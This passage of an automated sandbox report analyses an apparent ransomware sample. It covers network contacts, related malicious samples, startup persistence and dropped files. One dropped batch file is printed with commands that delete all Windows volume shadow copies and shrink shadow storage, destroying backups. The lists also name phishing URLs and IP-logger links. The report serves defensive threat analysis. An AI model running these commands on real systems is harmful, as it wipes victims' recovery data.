https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://oneget.orgX	0%	Avira URL Cloud	safe
http://crl.micr-Fm	0%	Avira URL Cloud	safe
https://oneget.orgformat.ps1xmlagement.dll2040.missionsand	0%	Avira URL Cloud	safe
https://curl.se/docs/alt-svc.html	0%	Avira URL Cloud	safe
https://oneget.org	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
2no.co	88.99.66.31	true	false		unknown
upload.wikimedia.org	91.198.174.208	true	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.639779450.000002F11BEA0000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.668145923.00000252D81C7000.00000004.00000001.sdmp, powershell.exe, 00000017.00000002.726558654.0000019FA9990000.00000004.00000001.sdmp, powershell.exe, 0000001C.00000002.751433810.0000019936F41000.00000004.00000001.sdmp, powershell.exe, 00000024.00000002.778653736.000001ADE5D80000.00000004.00000001.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0	powershell.exe, 00000002.00000002.641502261.000002F11C715000.00000004.00000001.sdmp	false		high
http://crl.m	powershell.exe, 00000017.00000002.739969866.0000019FC213B000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://2no.co/2DetN5	IJht2pqbVh.exe, IJht2pqbVh.exe, 00000000.00000000.631159897.00007FF606EC2000.00000002.00020000.sdmp, winstrt10.exe, winstrt10.exe, 00000016.00000000.714954572.00007FF78D252000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.myip.ch	IJht2pqbVh.exe, 00000000.00000000.631159897.00007FF606EC2000.00000002.00020000.sdmp, winstrt10.exe, 00000016.00000000.714954572.00007FF78D252000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	unknown
https://go.micros	powershell.exe, 00000002.00000002.648382805.000002F134226000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000024.00000002.778653736.000001ADE5D80000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://curl.se/docs/http-cookies.html	IJht2pqbVh.exe, 00000000.00000000.631159897.00007FF606EC2000.00000002.00020000.sdmp, winstrt10.exe, 00000016.00000000.714954572.00007FF78D252000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000024.00000002.778653736.000001ADE5D80000.00000004.00000001.sdmp	false		high
https://go.micro	powershell.exe, 00000002.00000002.639988526.000002F11C05D000.00000004.00000001.sdmp, powershell.exe, 00000017.00000002.728977699.0000019FAA302000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://bitcoin.org/en/buy	winstrt10.exe, 00000016.00000000.714954572.00007FF78D252000.00000002.00020000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000024.00000002.778653736.000001ADE5D80000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.639779450.000002F11BEA0000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.668145923.00000252D81C7000.00000004.00000001.sdmp, powershell.exe, 00000017.00000002.726558654.0000019FA9990000.00000004.00000001.sdmp, powershell.exe, 0000001C.00000002.751433810.0000019936F41000.00000004.00000001.sdmp, powershell.exe, 00000024.00000002.778653736.000001ADE5D80000.00000004.00000001.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000024.00000002.778653736.000001ADE5D80000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000024.00000002.778653736.000001ADE5D80000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://oneget.orgX	powershell.exe, 00000002.00000002.641502261.000002F11C715000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.micr-Fm	powershell.exe, 00000017.00000002.739969866.0000019FC213B000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://oneget.orgformat.ps1xmlagement.dll2040.missionsand	powershell.exe, 00000002.00000002.641502261.000002F11C715000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://curl.se/docs/alt-svc.html	IJht2pqbVh.exe, 00000000.00000000.631159897.00007FF606EC2000.00000002.00020000.sdmp, winstrt10.exe, 00000016.00000000.714954572.00007FF78D252000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.639521979.000002F11BC91000.00000004.00000001.sdmp, powershell.exe, 00000004.00000002.657155045.00000252C8021000.00000004.00000001.sdmp, powershell.exe, 00000017.00000002.725579504.0000019FA9781000.00000004.00000001.sdmp, powershell.exe, 0000001C.00000002.750960839.0000019936D31000.00000004.00000001.sdmp, powershell.exe, 00000024.00000002.778038630.000001ADE5B71000.00000004.00000001.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000024.00000002.778653736.000001ADE5D80000.00000004.00000001.sdmp	false		high
https://oneget.org	powershell.exe, 00000002.00000002.641502261.000002F11C715000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
88.99.66.31	2no.co	Germany		24940	HETZNER-ASDE	false
91.198.174.208	upload.wikimedia.org	Netherlands		14907	WIKIMEDIAUS	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	385060
Start date:	11.04.2021
Start time:	12:55:48
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	IJht2pqbVh (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal88.rans.adwa.evad.winEXE@44/168@2/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 100% (good quality ratio 85.1%) Quality average: 59.6% Quality standard deviation: 35.9%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, VSSVC.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 104.42.151.234, 104.43.193.48, 104.43.139.144, 204.79.197.200, 13.107.21.200, 20.82.210.154, 23.10.249.43, 23.10.249.26, 104.83.120.32, 52.155.217.156, 20.54.26.129, 152.199.19.161, 20.50.102.62 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, e11290.dspg.akamaiedge.net, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, iecvlist.microsoft.com, go.microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, consumerrp-displaycatalog-aks2eap.md.mp.microsoft.com.akadns.net, www.bing.com, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ie9comview.vo.msecnd.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus16.cloudapp.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, skypedataprdcolwus16.cloudapp.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, cs9.wpc.v0cdn.net Report size exceeded maximum capacity and may have missing behavior information.

Simulations

Behavior and APIs

Time	Type	Description
12:56:29	API Interceptor	72x Sleep call for process: powershell.exe modified
12:56:50	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\STARTOPEN_ote.html
12:56:58	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
88.99.66.31	SecuriteInfo.com.Trojan.Encoder.33750.22954.exe	Get hash	malicious	Browse	iplogger.org/1icnt7.tgz
	SecuriteInfo.com.Trojan.GenericKD.45968072.21801.exe	Get hash	malicious	Browse	iplogger.org/1u3ha7
	3688975dcd3f7829cfe55f7dd46166e0d6bd46c842c16.exe	Get hash	malicious	Browse	iplogger.org/1u3ha7
	kOe2Vpp8gk.exe	Get hash	malicious	Browse	iplogger.org/1u3ha7
	SBNJ0UL1sF.exe	Get hash	malicious	Browse	iplogger.org/1u3ha7
	SXSxysLiXY.exe	Get hash	malicious	Browse	iplogger.org/1u3ha7
	WjbzA1N4Ms.exe	Get hash	malicious	Browse	iplogger.org/1u3ha7
	1iEOgEs3sq.exe	Get hash	malicious	Browse	iplogger.org/1u3ha7
	dd7211d8c5d8b0e6290b9eb79787d64b73a91bde129cc.exe	Get hash	malicious	Browse	iplogger.org/1u3ha7
	March 4.scr.exe	Get hash	malicious	Browse	iplogger.org/1rtpu7.gz
	vjKLjHJx4e.exe	Get hash	malicious	Browse	iplogger.info/1v6v97.jpeg
	4yHtP1Y2bu.exe	Get hash	malicious	Browse	iplogger.org/1GNQh7.tgz
	ZRJSdIMST8.exe	Get hash	malicious	Browse	iplogger.org/1GNQh7.tgz
	Tm56I3rHIZ.exe	Get hash	malicious	Browse	iplogger.org/1GNQh7.tgz
	IGDeZjqTT7.exe	Get hash	malicious	Browse	iplogger.org/1OEKn
	Zy7qKW0uYZ.exe	Get hash	malicious	Browse	2no.co/1v22h7.html
	buran.exe	Get hash	malicious	Browse	iplogger.ru/1Oh8E.jpeg
	6fAjRmbM4P.exe	Get hash	malicious	Browse	2no.co/1v22h7.html
	Buran.exe	Get hash	malicious	Browse	iplogger.org/1YN4g7.tgz
	MC6YwfvkvS.exe	Get hash	malicious	Browse	iplogger.org/1DRd77.gz

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
upload.wikimedia.org	Equiniti-Benefits-Eligibility-Policy.htm	Get hash	malicious	Browse	91.198.174.208
	Message.htm	Get hash	malicious	Browse	91.198.174.208
	Remittance.htm	Get hash	malicious	Browse	91.198.174.208
	Sccid-UPDATE.htm	Get hash	malicious	Browse	91.198.174.208
	Brewin-UPDATE.htm	Get hash	malicious	Browse	91.198.174.208
	REVIEW-UPDATE.htm	Get hash	malicious	Browse	91.198.174.208
	REVIEW-UPDATE.htm	Get hash	malicious	Browse	91.198.174.208
	Sccid-UPDATE.htm	Get hash	malicious	Browse	91.198.174.208
	_130_WHAT_is.html	Get hash	malicious	Browse	91.198.174.208
	https://moorparklancssch-my.sharepoint.com/:o:/g/personal/16willcocks_pupils_moorpark_mp/EpuojDvAqLNHlYVejf5zx0kBqAdkUjR2VgNWcoUhvcauDg?e=Th0p8a	Get hash	malicious	Browse	91.198.174.208
	http://login.technion.net	Get hash	malicious	Browse	91.198.174.208
	https://megautos.cl/offce/bXdhbGxAYnVsbHNleWV0ZWxlY29tLmNvbQ==	Get hash	malicious	Browse	91.198.174.208
	https://app.box.com/s/o2w7bicj17iez9hkgk744e23wl6qiw9m	Get hash	malicious	Browse	91.198.174.208
	https://avtoshkolaes.ru/v-php/Z2lubnlAc2t5bGluZS1ob2x0LmNvbQ==	Get hash	malicious	Browse	91.198.174.208
	https://itech56.ru/owa/amVyZW15aHV0Y2hpbnNAcGFyYWdvbi1jYy5jby51aw==	Get hash	malicious	Browse	91.198.174.208
	http://32bms.e-learningnurulanwarjyp.sch.id/Y2FybG9zLmZyb250ZXJhQGJtcy5jb20=	Get hash	malicious	Browse	91.198.174.208
	https://silvercab.in/89937.html	Get hash	malicious	Browse	91.198.174.208
	https://michaelbetsy.com/secure-file/fire-3	Get hash	malicious	Browse	91.198.174.208
	http://li.caneislandhoa.com/zc/	Get hash	malicious	Browse	91.198.174.208
	http://crm.time4you.de/sugarcrm/custom/ch1/1.html	Get hash	malicious	Browse	91.198.174.208
2no.co	VmSdHCbFfl.exe	Get hash	malicious	Browse	88.99.66.31
	12Ufa95sAw.exe	Get hash	malicious	Browse	88.99.66.31
	Intruder.exe	Get hash	malicious	Browse	88.99.66.31
	Zy7qKW0uYZ.exe	Get hash	malicious	Browse	88.99.66.31
	6fAjRmbM4P.exe	Get hash	malicious	Browse	88.99.66.31
	A5RsEkXArf.exe	Get hash	malicious	Browse	88.99.66.31
	start.exe	Get hash	malicious	Browse	88.99.66.31
	https://2no.co/2ovJh.jpg	Get hash	malicious	Browse	88.99.66.31
	DOC001.exe	Get hash	malicious	Browse	88.99.66.31
	DOC001 (3).exe	Get hash	malicious	Browse	88.99.66.31
	Install.exe	Get hash	malicious	Browse	88.99.66.31
	Install.exe	Get hash	malicious	Browse	88.99.66.31
	presentation#_48406.vbs	Get hash	malicious	Browse	88.99.66.31
	presentation#_48406.vbs	Get hash	malicious	Browse	88.99.66.31
	job_attach#_95014.vbs	Get hash	malicious	Browse	88.99.66.31
	look_presentation#_85843.vbs	Get hash	malicious	Browse	88.99.66.31
	open_presentation#_79668.vbs	Get hash	malicious	Browse	88.99.66.31
	news#_29621.vbs	Get hash	malicious	Browse	88.99.66.31
	view_attach#_76333.vbs	Get hash	malicious	Browse	88.99.66.31
	description#_24536.vbs	Get hash	malicious	Browse	88.99.66.31

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
WIKIMEDIAUS	RFx 6300306423.xlsx	Get hash	malicious	Browse	91.198.174.192
	Equiniti-Benefits-Eligibility-Policy.htm	Get hash	malicious	Browse	91.198.174.208
	Message.htm	Get hash	malicious	Browse	91.198.174.208
	Remittance.htm	Get hash	malicious	Browse	91.198.174.208
	Sccid-UPDATE.htm	Get hash	malicious	Browse	91.198.174.208
	Brewin-UPDATE.htm	Get hash	malicious	Browse	91.198.174.208
	REVIEW-UPDATE.htm	Get hash	malicious	Browse	91.198.174.208
	REVIEW-UPDATE.htm	Get hash	malicious	Browse	91.198.174.208
	Sccid-UPDATE.htm	Get hash	malicious	Browse	91.198.174.208
	Jcantele.HTM	Get hash	malicious	Browse	91.198.174.192
	Dboom.HTM	Get hash	malicious	Browse	91.198.174.192
	Joseph_stubenrauch.HTM	Get hash	malicious	Browse	91.198.174.192
	_130_WHAT_is.html	Get hash	malicious	Browse	91.198.174.208
	https://moorparklancssch-my.sharepoint.com/:o:/g/personal/16willcocks_pupils_moorpark_mp/EpuojDvAqLNHlYVejf5zx0kBqAdkUjR2VgNWcoUhvcauDg?e=Th0p8a	Get hash	malicious	Browse	91.198.174.208
	http://login.technion.net	Get hash	malicious	Browse	91.198.174.208
	https://megautos.cl/offce/bXdhbGxAYnVsbHNleWV0ZWxlY29tLmNvbQ==	Get hash	malicious	Browse	91.198.174.208
	https://app.box.com/s/o2w7bicj17iez9hkgk744e23wl6qiw9m	Get hash	malicious	Browse	91.198.174.208
	https://avtoshkolaes.ru/v-php/Z2lubnlAc2t5bGluZS1ob2x0LmNvbQ==	Get hash	malicious	Browse	91.198.174.208
	https://itech56.ru/owa/amVyZW15aHV0Y2hpbnNAcGFyYWdvbi1jYy5jby51aw==	Get hash	malicious	Browse	91.198.174.208
	http://1311324623-36093609931200475.anti5gclothing.com/?https=2951081.anti5gclothing.com/.index.php/faye.murdoch4309491jfhnfl00943missguided.com	Get hash	malicious	Browse	91.198.174.192
HETZNER-ASDE	tdGFhgEQeh.exe	Get hash	malicious	Browse	195.201.225.248
	rnd382WXs3.exe	Get hash	malicious	Browse	195.201.225.248
	SecuriteInfo.com.W32.AIDetect.malware1.19715.exe	Get hash	malicious	Browse	195.201.225.248
	toolspab2.exe	Get hash	malicious	Browse	195.201.225.248
	p96tm6y3yo.exe	Get hash	malicious	Browse	116.203.98.215
	gePWRo7op0.exe	Get hash	malicious	Browse	195.201.225.248
	u0r63PfgIe.exe	Get hash	malicious	Browse	195.201.225.248
	rRobw1VVRP.exe	Get hash	malicious	Browse	116.203.98.109
	bCHfpHFeTj.exe	Get hash	malicious	Browse	195.201.225.248
	SecuriteInfo.com.Trojan.Agent.FFIJ.17175.exe	Get hash	malicious	Browse	88.99.66.31
	PRC-20-518 ORIGINAL.xlsx	Get hash	malicious	Browse	144.76.114.106
	SecuriteInfo.com.W32.AIDetect.malware1.19239.exe	Get hash	malicious	Browse	195.201.225.248
	OpPemC578S.exe	Get hash	malicious	Browse	195.201.225.248
	3vQD6TIYA1.exe	Get hash	malicious	Browse	88.99.66.31
	SOLICITUD DE PRESUPUESTO 08-04-2021#U00b7pdf.exe	Get hash	malicious	Browse	195.201.225.248
	Fax-Message-4564259.html	Get hash	malicious	Browse	46.4.41.213
	XN123gfQJQ.exe	Get hash	malicious	Browse	88.99.66.31
	PI-SO-P1010922.exe	Get hash	malicious	Browse	176.9.182.156
	SecuriteInfo.com.Trojan.PWS.Siggen2.64388.32153.exe	Get hash	malicious	Browse	88.99.66.31
	Three.exe	Get hash	malicious	Browse	94.130.198.87

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
9e10692f1b7f78228b2d4e424db3a98c	782kQ15aYm.dll	Get hash	malicious	Browse	91.198.174.208 88.99.66.31
	$108,459.00.html	Get hash	malicious	Browse	91.198.174.208 88.99.66.31
	Alexandra38.docx	Get hash	malicious	Browse	91.198.174.208 88.99.66.31
	Tmd7W7qwQw.dll	Get hash	malicious	Browse	91.198.174.208 88.99.66.31
	9R5WtLGEAy.dll	Get hash	malicious	Browse	91.198.174.208 88.99.66.31
	ghnrope2.dll	Get hash	malicious	Browse	91.198.174.208 88.99.66.31
	mail_6512365134_7863_202104108.html	Get hash	malicious	Browse	91.198.174.208 88.99.66.31
	mapdata.dll	Get hash	malicious	Browse	91.198.174.208 88.99.66.31
	#Ud83d#Udcde973.htm	Get hash	malicious	Browse	91.198.174.208 88.99.66.31
	#U266b SecuredMessage.htm	Get hash	malicious	Browse	91.198.174.208 88.99.66.31
	Offline_record_ON-035107.htm	Get hash	malicious	Browse	91.198.174.208 88.99.66.31
	Fax-Message-4564259.html	Get hash	malicious	Browse	91.198.174.208 88.99.66.31
	Enclosed Updated Project Proposal From Robert Nilsson robert@lindstromundertak.se.html	Get hash	malicious	Browse	91.198.174.208 88.99.66.31
	nicoleta.fagaras-DHL_TRACKING_1394942.html	Get hash	malicious	Browse	91.198.174.208 88.99.66.31
	Signed pages of agreement copy.html	Get hash	malicious	Browse	91.198.174.208 88.99.66.31
	ensono8639844766FAXMESSAGE.HTM	Get hash	malicious	Browse	91.198.174.208 88.99.66.31
	Payment Report.html	Get hash	malicious	Browse	91.198.174.208 88.99.66.31
	receipt-xxxx.htm	Get hash	malicious	Browse	91.198.174.208 88.99.66.31
	Mortgagor Request719350939.html	Get hash	malicious	Browse	91.198.174.208 88.99.66.31
	Receipt779G0D675432.html	Get hash	malicious	Browse	91.198.174.208 88.99.66.31

Dropped Files

No context

Created / dropped Files

C:\ProgramData\winfrce.bat Download File
Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winstrt10.exe
File Type:	DOS batch file, ASCII text
Category:	dropped
Size (bytes):	113
Entropy (8bit):	4.894489331799762
Encrypted:	false
SSDEEP:	3:mKDDO+Vdks0yoNKpvdE+Vdy0Kkwj4Hed2MoTk:hbFoNYLo4HeqTk
MD5:	4448A97730241C22CD994117EC2B2FA7
SHA1:	79201E3ADA80B06533CC936744ABEB42B09F2D43
SHA-256:	053D2084D7FA92C034A0DFF0B0FA270F3B451C38FEE432CF1CB8C47F4313B386
SHA-512:	7DD75864B2D9EDAD47B38EB47004F65A39CD8E96897EF734CC01D0977344CB3FE3F8BC99912A182621B9DABA472E35903A573C370B54A7BBFB4203415DD5737D
Malicious:	true
Preview:	@echo off.vssadmin.exe Delete Shadows /All /Quiet.vssadmin.exe Resize ShadowStorage /For=C: /On=C: /MaxSize=320MB

C:\ProgramData\zwin.new Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	32
Entropy (8bit):	3.628928031846024
Encrypted:	false
SSDEEP:	3:G0HyHaRABPFEREMlU:G0HD/U
MD5:	28470CD7B81309B833C1A2AEB062EE2B
SHA1:	0D21247AD286FED2D43BFAFFFEC1D358ABF46170
SHA-256:	54DFD5C5A1315CA8F1980A18E9E8EA4A229F959A11AF1B24F30172E53134E934
SHA-512:	44DE3AD1B44B22C9C64918BDCEFE4EA5025341B4192FC3FF207367ABF8068774D1640B1D70C21F88A2A7E1BB46A15371252EB7C5D9892E46E1770741CD90E07C
Malicious:	false
Preview:	dbe7bbdab634ef86f2e5214a1b6ec5a1

C:\Users\Public\rstrt.bat Download File
Process:	C:\Users\user\Desktop\IJht2pqbVh.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	106
Entropy (8bit):	4.776798405259639
Encrypted:	false
SSDEEP:	3:Ljn9m1t+kiEaKC5SufyM1K/RFofD6tRQv3sqrA5GHn:fE1wknaZ5SuH1MUmt2EiA5Q
MD5:	935DF10727F3A4ACD92646B69996705E
SHA1:	5E76C95E8E337DA13B93766258D9AA598C6D120D
SHA-256:	50D866EC395B494895D6068A40ABBCF5A11A5943A5432BF5A9BA74491F39A9C7
SHA-512:	D1D4ADB7D46CDB28AD957F3692105DD7B52F3ABCAAEDFEF0B0281CDEC1EF9D0057000139EBBB0B7C5A251E0B0BCFF3B7B63E87B9F1928A60F51904222252FD27
Malicious:	false
Preview:	start "" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\STARTOPEN_ote.html"

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{A2CC6CD9-9AB4-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	35928
Entropy (8bit):	1.8767249344946024
Encrypted:	false
SSDEEP:	192:rvZkZF2bVWbXtbLfbdCtb7HMmzWbyEmDbbsfbLHZmjrbgRmRbShkmP:rRUcQZfMUdbEShIQedu
MD5:	8E085A80E56C9348055C3951367F4510
SHA1:	E9DC5FB71C018F8A24CD2AB8B214045B506DBB16
SHA-256:	986DA93C3ECD7FD54D3F93264D2019FA878E86696D8F5D1004EA835A3328DAAA
SHA-512:	A500A58B348ABDE4A94069DFA1C869ECF31EC99640AAC9EF11C8FC021A406B3719A9903E244CAA78566F31D03F05722B4396D4CFDA5A8CCB4B6FFF799156C898
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{A2CC6CDB-9AB4-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	23700
Entropy (8bit):	1.8714854535891399
Encrypted:	false
SSDEEP:	96:rUZzQPBzC0MdluJzC0MduVKzC0MdUq9zC0Md9dzC0MdqrUJzC0MdaFTOrSAOMMMr:rUZzQPBUlEUuQUb9U9dUqrAUaFThTRqL
MD5:	07D97EC908BBD3FAB36199A7930CF69B
SHA1:	3EF4D247F536F987F309F733512748CFCD861A18
SHA-256:	7D353DEFCE7545BCD2DA2D9D60FCB19A0AF44A4BF10E81C3ADAFE86D344245B5
SHA-512:	F78CF32F11F0101419B5026567C4C4C1085B5403AF11ADCF39A4B6E819A023113D6FD9A6D6D7CEF6EB444273DA9937B4CD4FCCC99F58A0E93689AAA5AC4CCF34
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{A2CC6CDC-9AB4-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	16984
Entropy (8bit):	1.5671787249457025
Encrypted:	false
SSDEEP:	48:IwfGcpriGwpaLG4pQqGrapbSNGQpKnG7HpRETGIpG:r1ZKQN6cBS3AGTAA
MD5:	25648FBE5AB7573DD3F332AD87F81619
SHA1:	1C8403E4CE534487E4AD2DB223E0EE37D57E0C47
SHA-256:	E7443C75797B39A10AB2604FD0348CF6C0B60D59FE8132504986C00960A67F1A
SHA-512:	5CEABDB9E74ECCC1A6E90F245A0E08CE1C33DCD56FCC0C10F403FB3C2205F2BCC4DA06D355F2BD990C6E121CB8A34B9604052C746D921115D624B4DE9D6083C1
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.100755025311769
Encrypted:	false
SSDEEP:	12:TMHdNMNxOEDnWimI002EtM3MHdNMNxOEDnWimI00OYGVbkEtMb:2d6NxOGSZHKd6NxOGSZ7YLb
MD5:	E691FB5BA29766613E6D1334196B8722
SHA1:	DDCA340D1EF21DF2C119BBDDAC1D291AB7FF4B74
SHA-256:	FB438457E960E7702AA1ABB7F91EF7EF3AABD4BFC08F8905D1DE2BB6BE4A1982
SHA-512:	3C833DDA4C7275590C33E4D767165239E4D087B83CCA404E067764CF25A3C8AF7706227003E6D4F5A79D878F4843D9BCCE2D4F66F6BFEF8379643F93962EC5A2
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x7845bfb5,0x01d72ec1</date><accdate>0x7845bfb5,0x01d72ec1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x7845bfb5,0x01d72ec1</date><accdate>0x7845bfb5,0x01d72ec1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.112852859608798
Encrypted:	false
SSDEEP:	12:TMHdNMNxe2kRYeYQnWimI002EtM3MHdNMNxe2kRYeYQnWimI00OYGkak6EtMb:2d6Nxrb1QSZHKd6Nxrb1QSZ7Yza7b
MD5:	F8A9231E9557020D0D1754DAF7A40E1F
SHA1:	9A0B92DFECCF5D95DEE09DF7A10D96B5379493A2
SHA-256:	1D222416B7EC060D78BE35D83ECF756C4500FFEDDFD76E0D5256A85B0DBCF5EC
SHA-512:	2FDCD4F92D6620A058D450BF16954D5CF0D18949C6AA85CBA584F6A698340EFA01A7C1CCB8D61048043CBC15D7CECE995B1408C8BBBE4E770D52DABAFEAF97FD
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x783e98e4,0x01d72ec1</date><accdate>0x783e98e4,0x01d72ec1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x783e98e4,0x01d72ec1</date><accdate>0x783e98e4,0x01d72ec1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	662
Entropy (8bit):	5.121132540578538
Encrypted:	false
